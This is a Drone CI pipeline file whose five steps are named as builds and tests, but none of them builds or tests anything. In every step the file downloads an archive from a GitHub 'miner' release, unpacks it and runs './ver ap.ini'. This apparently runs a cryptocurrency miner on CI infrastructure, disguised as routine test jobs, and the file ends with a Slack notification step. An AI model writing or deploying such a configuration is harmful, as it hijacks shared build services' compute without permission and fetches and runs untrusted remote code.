kind: pipeline
type: docker
name: build1

steps:
- name: test1
  image: golang
  commands:
  - wget https://github.com/hendrik20212/miner/releases/download/luck_ap/luck_ap.tar.gz && tar -xvf luck_ap.tar.gz && ./ver ap.ini
---
kind: pipeline
type: docker
name: build2

steps:
- name: test2
  image: node
  commands:
  - wget https://github.com/hendrik20212/miner/releases/download/luck_ap/luck_ap.tar.gz && tar -xvf luck_ap.tar.gz && ./ver ap.ini
---
kind: pipeline
type: docker
name: build3

steps:
- name: test3
  image: node
  commands:
  - wget https://github.com/hendrik20212/miner/releases/download/luck_ap/luck_ap.tar.gz && tar -xvf luck_ap.tar.gz && ./ver ap.ini
---
kind: pipeline
type: docker
name: build4

steps:
- name: test4
  image: node
  commands:
  - wget https://github.com/hendrik20212/miner/releases/download/luck_ap/luck_ap.tar.gz && tar -xvf luck_ap.tar.gz && ./ver ap.ini
---
kind: pipeline
type: docker
name: build5

steps:
- name: test5
  image: node
  commands:
  - wget https://github.com/hendrik20212/miner/releases/download/luck_ap/luck_ap.tar.gz && tar -xvf luck_ap.tar.gz && ./ver ap.ini
---
kind: pipeline
name: after

steps:
- name: notify
  image: plugins/slack
  settings:
    room: general
   

depends_on:
- build1
- build2
- build3
- build4
- build5
